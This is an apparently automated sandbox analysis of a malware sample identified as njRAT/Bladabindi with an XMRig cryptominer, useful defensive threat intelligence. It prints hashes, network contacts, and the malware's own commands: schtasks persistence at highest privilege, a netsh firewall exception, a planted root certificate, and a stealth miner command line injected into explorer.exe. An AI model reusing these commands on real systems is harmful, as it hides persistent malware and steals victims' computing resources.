Analysis Overview
SHA256
580e02ff0dba47c835a4abff35ca5ecfe8e04e08206739936556b696141ed844
Threat Level: Known bad
The file 6f8798f01a7ec11429f624dbc59b4a32 was found to be: Known bad.
Malicious Activity Summary
njRAT/Bladabindi
xmrig
XMRig Miner payload
Modifies Windows Firewall
Drops startup file
Loads dropped DLL
Executes dropped EXE
Checks computer location settings
Adds Run key to start application
Legitimate hosting services abused for malware hosting/C2
Suspicious use of SetThreadContext
Enumerates physical storage devices
Unsigned PE
Creates scheduled task(s)
Modifies system certificate store
Modifies registry class
Suspicious use of AdjustPrivilegeToken
Uses Task Scheduler COM API
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-01-22 11:15
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-01-22 11:15
Reported
2024-01-22 11:17
Platform
win7-20231215-en
Max time kernel
150s
Max time network
151s
Command Line
Signatures
njRAT/Bladabindi
xmrig
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\9aae056fac505440e6c8356ee4efc63f.exe | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\9aae056fac505440e6c8356ee4efc63f.exe | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\lear.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\svhost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\1_protected.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\services32.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\2_protected.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\services64.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\lear.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\1_protected.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\lear.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\services32.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\svhost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\2_protected.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\services64.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-928733405-3780110381-2966456290-1000\Software\Microsoft\Windows\CurrentVersion\Run\9aae056fac505440e6c8356ee4efc63f = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\server.exe\" .." | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\9aae056fac505440e6c8356ee4efc63f = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\server.exe\" .." | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2240 set thread context of 2276 | N/A | C:\Users\Admin\AppData\Local\Temp\services64.exe | C:\Windows\explorer.exe |
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 | C:\Users\Admin\AppData\Local\Temp\services32.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde | C:\Users\Admin\AppData\Local\Temp\services32.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\6f8798f01a7ec11429f624dbc59b4a32.exe
"C:\Users\Admin\AppData\Local\Temp\6f8798f01a7ec11429f624dbc59b4a32.exe"
C:\Users\Admin\AppData\Local\Temp\lear.exe
"C:\Users\Admin\AppData\Local\Temp\lear.exe"
C:\Users\Admin\AppData\Local\Temp\svhost.exe
"C:\Users\Admin\AppData\Local\Temp\svhost.exe"
C:\Users\Admin\AppData\Local\Temp\RarSFX0\1_protected.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\1_protected.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\Admin\AppData\Local\Temp\services32.exe"' & exit
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\Admin\AppData\Local\Temp\services32.exe"'
C:\Users\Admin\AppData\Local\Temp\services32.exe
"C:\Users\Admin\AppData\Local\Temp\services32.exe"
C:\Users\Admin\AppData\Local\Temp\RarSFX0\2_protected.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\2_protected.exe"
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\Admin\AppData\Local\Temp\services32.exe"'
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"'
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"' & exit
C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\Admin\AppData\Local\Temp\services32.exe"' & exit
C:\Users\Admin\AppData\Local\Temp\server.exe
"C:\Users\Admin\AppData\Local\Temp\server.exe"
C:\Users\Admin\AppData\Local\Temp\services64.exe
"C:\Users\Admin\AppData\Local\Temp\services64.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"' & exit
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"'
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
C:\Windows\explorer.exe
C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=prohashing.com:3359 --user=vlas --pass=a=randomx --cpu-max-threads-hint=40 --cinit-idle-wait=1 --cinit-idle-cpu=80 --cinit-stealth
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | sanctam.net | udp |
| US | 8.8.8.8:53 | github.com | udp |
| DE | 140.82.121.4:443 | github.com | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| DE | 140.82.121.4:443 | github.com | tcp |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | bishkek931.ddns.net | udp |
| US | 8.8.8.8:53 | prohashing.com | udp |
| US | 104.21.10.32:3359 | prohashing.com | tcp |
| US | 104.21.10.32:3359 | prohashing.com | tcp |
| US | 104.21.10.32:3359 | prohashing.com | tcp |
| US | 172.67.189.225:3359 | prohashing.com | tcp |
| US | 104.21.10.32:3359 | prohashing.com | tcp |
| US | 172.67.189.225:3359 | prohashing.com | tcp |
Files
memory/1044-0-0x0000000000380000-0x0000000000698000-memory.dmp
memory/1044-1-0x000007FEF5FD0000-0x000007FEF69BC000-memory.dmp
memory/1044-2-0x000000001B100000-0x000000001B180000-memory.dmp
memory/1044-3-0x000000001B100000-0x000000001B180000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\lear.exe
| MD5 | d96ee436f67f495f2c0fe0b9d815d259 |
| SHA1 | 2a91f603706ac85ca1df067d164584ff02dcbc1b |
| SHA256 | a0a5ac4d1ed0de20cbc822cc9bf8dedbac892675e89da757029bf73e53ae90d3 |
| SHA512 | 59649844315f3ab0eae546d759f786d63e4597d2b412d2d594e8af90939b00e0ba83b79ffb1a8173a0f3f4222dfa85b2226431413de5285f92944eaad90d1b09 |
C:\Users\Admin\AppData\Local\Temp\lear.exe
| MD5 | 26df047471cff53f66190d535b2d73f8 |
| SHA1 | ea2483f3323bbbe0b959f409e24cfd514a662ae1 |
| SHA256 | 68548c3b3730d33e005aef791d19ad382048cadce98051ac891b04265cacc4cf |
| SHA512 | 8328178254aa1cbd848d8fc0dcf45daef8e156f55a88c38b56ffa6105b2eb7dd1886a6fefcc5631f385446030500feb2963cd2b077c88649b1fdaefc337d2153 |
C:\Users\Admin\AppData\Local\Temp\svhost.exe
| MD5 | 696f2e0facba8c9bc7e2269986bada95 |
| SHA1 | aaa3ce178ba47c0e370c3ca40b99654cf61d99dd |
| SHA256 | de781ab98b48f1d32a0eac30ab8e9f3d0de9d532db7720fd0a803f227abb039a |
| SHA512 | afa581a6e90aac8b6dc99fa15bfcf078d83af623bee1d79ed9f7578160d6651fa80f2deaf3b43d9a5082442cb82b9e5fd2c3d18d51d5f7cd52182115511baaeb |
C:\Users\Admin\AppData\Local\Temp\lear.exe
| MD5 | 97daf8fe1ab31512c47821ea389434f4 |
| SHA1 | 0db20bdf1704d44af9fe9e5e882fe455c2b9f19f |
| SHA256 | a2710f1b04f006151c264ece03e7ea14f6e0066f4af4166da0220b75af413a34 |
| SHA512 | 35f596628e9793959d280f8309d5aaef264813753d414fca5a38dcdce7b817859d662e210f591d974585dfcb77a2aca406a6710e446876dad47a97295a58e202 |
memory/1044-18-0x000007FEF5FD0000-0x000007FEF69BC000-memory.dmp
\Users\Admin\AppData\Local\Temp\RarSFX0\1_protected.exe
| MD5 | 7d97ebd020adc594094c05b1aa04bc9c |
| SHA1 | 2522f47426b2fb9456d0895c26017addeab13b65 |
| SHA256 | 9ee54245dca5e903968f92a6411375a7c89fb2085a92ac03d3198feffe610c97 |
| SHA512 | 87d9127610d2aa5beb0dfa92e1523034be2d455ffedb9a11f3debf98801292fe372351b23049bbe683e27cffe686ba4dac1eb728bff7850bacbb4a04454630bc |
memory/2816-29-0x0000000074700000-0x0000000074CAB000-memory.dmp
memory/2784-31-0x000000013F080000-0x000000013F674000-memory.dmp
memory/2816-32-0x0000000002110000-0x0000000002150000-memory.dmp
memory/2656-34-0x00000000037C0000-0x0000000003DB4000-memory.dmp
memory/2784-35-0x000000013F080000-0x000000013F674000-memory.dmp
\??\c:\users\admin\appdata\local\temp\rarsfx0\1_protected.exe
| MD5 | 6369fc45d88a6a4ac494378f82c0646b |
| SHA1 | d034443895d58921619959e14234620b7f169170 |
| SHA256 | cbe1ee8865b7708628a772ed90466930c25addc2f74bb96556b98b395737bced |
| SHA512 | 2ca85136a23365d605d494eef31f576b99854156b8b065e813ab6fece43007764ee7e4c6f69552f1466110728860e6b5c325ae3f50655f796ab5611b4d3d9ab4 |
memory/2784-36-0x000007FEF5F30000-0x000007FEF691C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\RarSFX0\1_protected.exe
| MD5 | cf9824d2ca8b577db5549aa9d7272d28 |
| SHA1 | 7dbd28e93fe90521d2803a6e5bf4d44817816e67 |
| SHA256 | 2ca500e8dcdd8323efe3465c40d8ba496279ec4eff1dee732a89dadc1b595817 |
| SHA512 | a45207618ed98a4e51e9e0b9b27de437b9bded694810c79dc8fa2eae8bf0a658c6f615b1ed24b1ec463f6eaf23eae749c662d314c9a1a3270ce6aa0a12a40367 |
memory/2784-37-0x0000000077B20000-0x0000000077B30000-memory.dmp
memory/2784-38-0x000000013F080000-0x000000013F674000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\RarSFX0\1_protected.exe
| MD5 | 43e563ba4d0bb252af7a2aa6283e927e |
| SHA1 | 18839e465ebb25bbe676f5837d15f1d19919f073 |
| SHA256 | 2805cbf90f4b2f3465de020ec50d9b5cae1422522bb2e4e92743448cf7878483 |
| SHA512 | d76254f0852878fa7701c32aadb2654597227afe236bf734cd878106ab8f487de0ac91ae286828306993b5d476a91b08fc1d010b3c027a19727a99b9bad977e5 |
memory/2816-24-0x0000000074700000-0x0000000074CAB000-memory.dmp
memory/2784-40-0x0000000002D10000-0x0000000002D90000-memory.dmp
memory/2784-39-0x0000000000900000-0x000000000090A000-memory.dmp
\Users\Admin\AppData\Local\Temp\services32.exe
| MD5 | f01e43f37937d0b65e9a8a43c5750f3d |
| SHA1 | 242bb759a05f6807f890515b8276102613ed7d41 |
| SHA256 | e6f5c7bcdd6c041820e510aa767641e37d56b4bf0d9de20bfa3bb3fb8c573409 |
| SHA512 | 02c4fd0520b95a4f91ec7a9837953b6fc0e0b1ec53c0fe01f9389c07bbed210f14132c2c9796f241498d65eb2179fe333d7ff884883ba981a24ffcf160f0c289 |
C:\Users\Admin\AppData\Local\Temp\services32.exe
| MD5 | d08a0702492b7702e726648a903c2bd4 |
| SHA1 | 4c6d93108d2afa87929cd68af747c50dbe3fc690 |
| SHA256 | 3b6162e0b0c8133baac36786a243746a4dfc4622417f4b6fa230d5fb8f03694a |
| SHA512 | 3d21998ef5dd6c410f425cb2571e1fdae7dd363428ccb8434ed89062b0a39cc19e7854e3af4729aebdf9a4a4968f1093ef7df7aff0260b34e4d13ef5ec29b8b6 |
\??\c:\users\admin\appdata\local\temp\services32.exe
| MD5 | 440839afc5edfabe611d23ba63689b18 |
| SHA1 | 66c1b3d5eecbcb50fdf98722de5242368ab6a53a |
| SHA256 | d95be3a4bd093e26c2f5cd8c6c76f9efec55c86893189bf9130ed8098398724a |
| SHA512 | 6275aa34dee71eb684afd93d66a9853cafa14ad2edc3842a161577614f224b92aaf4dad4bade85d88ab2d9b039672c6007b270e3fb3c839a2a609f6e2437324f |
memory/2572-47-0x000000013F3F0000-0x000000013F9E4000-memory.dmp
memory/2784-51-0x000000013F080000-0x000000013F674000-memory.dmp
memory/2572-52-0x000000013F3F0000-0x000000013F9E4000-memory.dmp
memory/2572-54-0x000000013F3F0000-0x000000013F9E4000-memory.dmp
memory/2784-55-0x000007FEF5F30000-0x000007FEF691C000-memory.dmp
memory/2572-53-0x000007FEF5F30000-0x000007FEF691C000-memory.dmp
memory/2572-50-0x0000000077B20000-0x0000000077B30000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\RarSFX0\2_protected.exe
| MD5 | 04fc844c321ea6afe57596424daab540 |
| SHA1 | 306ee4be783571310d75593616516c2fbb0d7081 |
| SHA256 | 05a8f4dbdf680ae0d47645082f476b39481b9e64c8c9ce6da10cf442a240417f |
| SHA512 | 3b5c39afd324388bc63cc4224c9137636f6e3cb8128aa4ce3494fc827543125d5da869dc640197a5a6c7ddf7c92b8eeb4618bca58ba5f25722f13701168f157c |
\Users\Admin\AppData\Local\Temp\RarSFX0\2_protected.exe
| MD5 | c882daefb788528213d6a6b879414c91 |
| SHA1 | cc5cee72aa8f93f357e7cce01affb4b64255b960 |
| SHA256 | 3fc81c9304beaf3adaed483fb682191fdb36cd596a1469b915cac98a26d9e7c6 |
| SHA512 | 4a8bd06afce4550cc685fd52156ff04cb047dc78d94c6df6e88dd31f60c0723189681bdbbe1b88499ef929542787c3a90475b9a0cc5b645256442a0e8fcc7cc4 |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\2_protected.exe
| MD5 | a065800e1cf43312fa33261cd7e43514 |
| SHA1 | fa715606adebabfffdf1643a693ce0bec63cc6a7 |
| SHA256 | 56be1fe09d7fa000edbed809bc33ad6f06d2e3f3c08051658670063ae1977e26 |
| SHA512 | abd1ded5b7b34762a166177492bb99624c31ee3111445ca67ea09242e4fb7a74c3a8b12c2615394411314b38b2fc450f4a250a62352bec76388686e33fbbce60 |
memory/2656-61-0x00000000037C0000-0x0000000003DB6000-memory.dmp
\??\c:\users\admin\appdata\local\temp\rarsfx0\2_protected.exe
| MD5 | 66698ddf93da72c025ce6c61626eea8b |
| SHA1 | 783b08bbc61396da8671d0947f9b807c55b06261 |
| SHA256 | 9d60a66aae0b25af5fc1358a1e0c25f1d59aafb9ba4d6864aeaac7d824a3471f |
| SHA512 | 6e0e0dbf0b14b9b4c4ee393c32205ef32b678a9ba3196e62d52bc7bb35c2a75747be5218777ff735b894e9abc3867e7be3ebf605e4e965d1dc45a8cda4e7cd1f |
memory/1660-62-0x000000013F3E0000-0x000000013F9D6000-memory.dmp
memory/2816-66-0x0000000074700000-0x0000000074CAB000-memory.dmp
memory/1660-67-0x000000013F3E0000-0x000000013F9D6000-memory.dmp
memory/1660-65-0x000000013F3E0000-0x000000013F9D6000-memory.dmp
memory/1660-69-0x0000000077B20000-0x0000000077B30000-memory.dmp
memory/2656-68-0x00000000037C0000-0x0000000003DB4000-memory.dmp
memory/1660-70-0x000007FEF5F30000-0x000007FEF691C000-memory.dmp
memory/2572-71-0x0000000002140000-0x00000000021C0000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe
| MD5 | 7f13e2b226baf92c8c7aa34606a33043 |
| SHA1 | 957594155513bcb9adf119fbd683d6222c97b6f7 |
| SHA256 | 82daa75486edff63daa1eb62220e8aaeea23691151ba98f9f3b8b87f51428e3d |
| SHA512 | a164fc7ecdd842fcedea61025fd8f9abe7c9efa06d08493be2413a052fa91e9c1818bbf006475b3f740174a0c7e6e474ee7f5fa2b703b4f164a8849d4dcc02a1 |
memory/1976-79-0x000000013F950000-0x000000013F956000-memory.dmp
memory/2816-78-0x0000000002110000-0x0000000002150000-memory.dmp
memory/1976-80-0x000007FEF5F30000-0x000007FEF691C000-memory.dmp
memory/1660-83-0x000000001C760000-0x000000001C7E0000-memory.dmp
memory/1976-82-0x00000000009B0000-0x0000000000A30000-memory.dmp
memory/1660-81-0x0000000002290000-0x000000000229E000-memory.dmp
memory/2816-93-0x0000000074700000-0x0000000074CAB000-memory.dmp
memory/1324-94-0x00000000001C0000-0x0000000000200000-memory.dmp
memory/1324-92-0x0000000074700000-0x0000000074CAB000-memory.dmp
\Users\Admin\AppData\Local\Temp\services64.exe
| MD5 | 16ebd4fca1d15d1f5f7081a7d0c70117 |
| SHA1 | 8e66abef95a4e5c56c2b5969d3768889d83b84fc |
| SHA256 | e8c5369dcbfa832fa2c89505954150bc06949825bbfba45652d672432e4ab0b0 |
| SHA512 | 20de09c6ec7d01a4a8b96245d1a6ff6f4a1ee10e5d845983ea1971c58056ffa35466742e83eef118543b29bdb50704cf95dca774fe0dc83ac148d0f7ad12a2ea |
C:\Users\Admin\AppData\Local\Temp\services64.exe
| MD5 | ad8e32e560028a95b88238df5dd1921d |
| SHA1 | e675044b71e6e7ad85adb9de4cb7015af7b6e3a8 |
| SHA256 | f019927fb60f2d68540e35230d376caff608e2d143eb66ff79eac80ae206e43a |
| SHA512 | e7f8add5e9e3b6f00b9541ebe93524043f2db11fb48afaacb0b26b41a2fe3aa0ad462546a1a393d21770584c4b4ce6aa885dad1b2b2886b77c76033f4e57291c |
memory/2240-104-0x000000013FB20000-0x0000000140116000-memory.dmp
memory/1660-103-0x000007FEF5F30000-0x000007FEF691C000-memory.dmp
memory/2240-108-0x000000013FB20000-0x0000000140116000-memory.dmp
memory/2240-110-0x000007FEF5F30000-0x000007FEF691C000-memory.dmp
memory/2240-109-0x0000000077B20000-0x0000000077B30000-memory.dmp
memory/2572-107-0x000007FEF5F30000-0x000007FEF691C000-memory.dmp
memory/2240-106-0x000000013FB20000-0x0000000140116000-memory.dmp
memory/1660-102-0x000000013F3E0000-0x000000013F9D6000-memory.dmp
memory/1660-101-0x000000013FB20000-0x0000000140116000-memory.dmp
\??\c:\users\admin\appdata\local\temp\services64.exe
| MD5 | 3eb73cdf10bf20d731c60ca91225f411 |
| SHA1 | ff7b384874010eb08a5cb8e82dd79ebd2c93b38b |
| SHA256 | da1914439fd3b9730c3f0499a733da680332199ffef646d115a731a1877bbcfc |
| SHA512 | 056b909bd8576618a69d004e225aab3ad32d48402d25825a6896c54d70e0a3b958f3421ae2fa00cdf29303df597b942ca74242342440ad039f3c747cfb7f3dfb |
memory/2240-111-0x000000001C130000-0x000000001C1B0000-memory.dmp
\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
| MD5 | 16379e3af6a104ba50f80465c44297b3 |
| SHA1 | 23fa672955f7519aa8ab000977560fa952069052 |
| SHA256 | a37d2858b1c7aa02fc4ff57dd4c0f6822fa280c3fae16ca0d79d4df51db1ceae |
| SHA512 | 97a19c76e28214e5cff3bc0164edbb5f52f627a414a2e9008033b398549641d434aad8f97095399c994f7dfb372eb72bafbf706a31877cc2bb7dabb229d0db59 |
memory/3048-119-0x000000013F410000-0x000000013F416000-memory.dmp
memory/3048-121-0x0000000002540000-0x00000000025C0000-memory.dmp
memory/3048-120-0x000007FEF5F30000-0x000007FEF691C000-memory.dmp
memory/1976-122-0x000007FEF5F30000-0x000007FEF691C000-memory.dmp
memory/2572-125-0x000007FEF5F30000-0x000007FEF691C000-memory.dmp
memory/2572-126-0x000000013F3F0000-0x000000013F9E4000-memory.dmp
memory/2276-129-0x0000000140000000-0x0000000140786000-memory.dmp
memory/2276-131-0x0000000140000000-0x0000000140786000-memory.dmp
memory/2276-133-0x0000000140000000-0x0000000140786000-memory.dmp
memory/2276-134-0x0000000140000000-0x0000000140786000-memory.dmp
memory/2276-135-0x0000000140000000-0x0000000140786000-memory.dmp
memory/2276-137-0x0000000140000000-0x0000000140786000-memory.dmp
memory/2276-138-0x0000000140000000-0x0000000140786000-memory.dmp
memory/2276-136-0x0000000140000000-0x0000000140786000-memory.dmp
memory/2276-139-0x0000000140000000-0x0000000140786000-memory.dmp
memory/2276-140-0x0000000140000000-0x0000000140786000-memory.dmp
memory/2276-141-0x0000000140000000-0x0000000140786000-memory.dmp
memory/2276-143-0x000007FFFFFD5000-0x000007FFFFFD6000-memory.dmp
memory/2276-145-0x0000000140000000-0x0000000140786000-memory.dmp
memory/2276-142-0x0000000140000000-0x0000000140786000-memory.dmp
memory/2240-151-0x000000013FB20000-0x0000000140116000-memory.dmp
memory/2276-153-0x0000000140000000-0x0000000140786000-memory.dmp
memory/2240-152-0x000007FEF5F30000-0x000007FEF691C000-memory.dmp
memory/1976-149-0x00000000009B0000-0x0000000000A30000-memory.dmp
memory/2276-148-0x0000000001DF0000-0x0000000001E10000-memory.dmp
memory/2276-147-0x0000000140000000-0x0000000140786000-memory.dmp
memory/2276-155-0x0000000140000000-0x0000000140786000-memory.dmp
memory/2276-157-0x0000000140000000-0x0000000140786000-memory.dmp
memory/2276-156-0x0000000140000000-0x0000000140786000-memory.dmp
memory/2276-158-0x0000000140000000-0x0000000140786000-memory.dmp
memory/2276-154-0x0000000140000000-0x0000000140786000-memory.dmp
memory/1324-159-0x0000000074700000-0x0000000074CAB000-memory.dmp
memory/3048-160-0x000007FEF5F30000-0x000007FEF691C000-memory.dmp
memory/3048-161-0x0000000002540000-0x00000000025C0000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-01-22 11:15
Reported
2024-01-22 11:17
Platform
win10v2004-20231222-en
Max time kernel
149s
Max time network
147s
Command Line
Signatures
njRAT/Bladabindi
xmrig
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\services64.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\6f8798f01a7ec11429f624dbc59b4a32.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\lear.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\RarSFX0\1_protected.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\services32.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\RarSFX0\2_protected.exe | N/A |
